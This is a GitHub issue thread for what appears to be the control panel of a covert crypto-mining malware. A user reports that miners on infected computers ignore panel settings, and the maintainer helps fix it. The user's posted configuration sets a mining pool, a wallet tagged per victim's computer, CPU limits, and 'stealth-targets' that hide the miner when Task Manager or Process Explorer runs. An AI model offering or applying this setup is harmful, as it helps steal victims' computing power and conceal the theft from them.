### ISSUE TITLE
Configuration settings

### ISSUE THREAD

**Issue by Demon4u** [UnamSanctam/UnamWebPanel#132]
Configuration settings in the panel are not switched.
Miners continue to work on default parameters that were transmitted during infection
![Screenshot_1](https://user-images.githubusercontent.com/85320553/168691353-abb2ffea-9028-4844-987a-732a86f9c3e6.jpg)

**Comment by UnamSanctam** [comment]
Can you post your configuration? It will only switch if the configuration is correct.

**Comment by Demon4u** [comment]
{
    "algo": "rx/0",
    "pool": "randomxmonero.auto.nicehash.com",
    "port": 9200,
    "wallet": "wallet.{COMPUTERNAME}",
    "password": "",
    "nicehash": true,
    "ssltls": false,
    "max-cpu": 40,
    "idle-wait": 7,
    "idle-cpu": 90,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""
}

**Comment by UnamSanctam** [comment]
Hmm that should work (tried it on my own), the `wallet` is set to your NiceHash BTC wallet correct? A lot of IPs are also blocked from NiceHash which could be the cause as well (I have to mine with a VPN since my real IP is blocked by them).

**Comment by UnamSanctam** [comment]
There shouldn't be any difference between the versions in regard to that, try reinstalling v1.5.0 and see what happens.

**Comment by Demon4u** [comment]
it worked. thanks
